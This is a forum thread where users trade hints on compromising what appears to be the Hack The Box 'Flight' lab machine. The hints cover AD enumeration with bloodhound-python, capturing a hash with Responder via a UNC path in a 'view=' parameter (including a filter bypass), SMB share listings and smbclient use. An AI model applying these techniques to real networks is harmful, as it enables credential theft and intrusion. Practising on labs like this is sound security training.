idk i was Able To Use bloodhound-python And Dump Some Parts Of The Ad

(November 5, 2022, 11:55 PM)loge23 Wrote:

(November 5, 2022, 11:39 PM)yumi Wrote: @loge23, Nice you are the best  :heart:. but where you guys get this password from svc_apache ? kerberos pre authentication ? : from a file with SSRF ?

Responder

Thanks for the hint. I was just about to write that I'm getting "Suspicious Activity Blocked" when trying view=\\10.10.x.x\test. But view=//10.10.x.x/test works nicely.

(November 6, 2022, 06:11 AM)htbhtbhtb Wrote: Lmao at this user's description:

GET-DESC... flight.htb      389    G0              User: I.Francis description: Nobody knows why he's here

😁 😁

PS C:\xampp\htdocs> net user I.Francis
net user I.Francis
User name                    I.Francis
Full Name                    
Comment                      Nobody knows why he's here
User's comment               
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            9/22/2022 12:08:22 PM
Password expires             Never
Password changeable          9/23/2022 12:08:22 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script                 
User profile                 
Home directory               
Last logon                   Never

Logon hours allowed          All

Local Group Memberships      
Global Group memberships     *Domain Users         
The command completed successfully.

Any hint about how to get c.bum hash ?

(November 6, 2022, 06:30 AM)vuln63 Wrote: Im Stuck To s.moon Has Write Access To The Share Shared But I Havent Been Able To Write To It

---

[+] IP: flight.htb:445  Name: unknown                                         
        Disk                                                    Permissions    Comment
        ----                                                    -----------    -------
        ADMIN$                                                  NO ACCESS      Remote Admin
        C$                                                      NO ACCESS      Default share
        IPC$                                                    READ ONLY      Remote IPC
        NETLOGON                                                READ ONLY      Logon server share
        Shared                                                  READ, WRITE
        SYSVOL                                                  READ ONLY      Logon server share
        Users                                                  READ ONLY
        Web                                                    READ ONLY

IN THIS ROUTE FIND THE  USER FLAG

smb: \C.Bum\Desktop\> dir
  .                                  DR        0  Thu Sep 22 15:17:02 2022
  ..                                 DR        0  Thu Sep 22 15:17:02 2022
  user.txt                           AR       34  Thu Nov  3 12:55:16 2022

		5056511 blocks of size 4096. 937891 blocks available
smb: \C.Bum\Desktop\> 

(November 6, 2022, 07:25 AM)may123a Wrote:

(November 6, 2022, 06:30 AM)vuln63 Wrote: Im Stuck To s.moon Has Write Access To The Share Shared But I Havent Been Able To Write To It

---

[+] IP: flight.htb:445  Name: unknown                                         
        Disk                                                    Permissions    Comment
        ----                                                    -----------    -------
        ADMIN$                                                  NO ACCESS      Remote Admin
        C$                                                      NO ACCESS      Default share
        IPC$                                                    READ ONLY      Remote IPC
        NETLOGON                                                READ ONLY      Logon server share
        Shared                                                  READ, WRITE
        SYSVOL                                                  READ ONLY      Logon server share
        Users                                                  READ ONLY
        Web                                                    READ ONLY

IN THIS ROUTE FIND THE  USER FLAG

smb: \C.Bum\Desktop\> dir
  .                                  DR        0  Thu Sep 22 15:17:02 2022
  ..                                 DR        0  Thu Sep 22 15:17:02 2022
  user.txt                           AR       34  Thu Nov  3 12:55:16 2022

		5056511 blocks of size 4096. 937891 blocks available
smb: \C.Bum\Desktop\> 

How did you do this? I'm connected as S.Moon to the "Users" share but I'm getting access denied:

smb: \> cd C.Bum
smb: \C.Bum\> dir
NT_STATUS_ACCESS_DENIED listing \C.Bum\*
smb: \C.Bum\> cd Desktop
cd \C.Bum\Desktop\: NT_STATUS_ACCESS_DENIED

How you guys are all get c.bum user ntlm?

Can someone five a nudge on root.

how did you get the shell? i couldn't even get smbclient, i had to use smbmap to download the files on smb

(November 6, 2022, 08:22 AM)yumi Wrote: how did you get the shell? i couldn't even get smbclient, i had to use smbmap to download the files on smb

Simple SMBClient command:

smbclient -L \\ip

You can then authenticate using -U with the user and hash that you may be able to find :)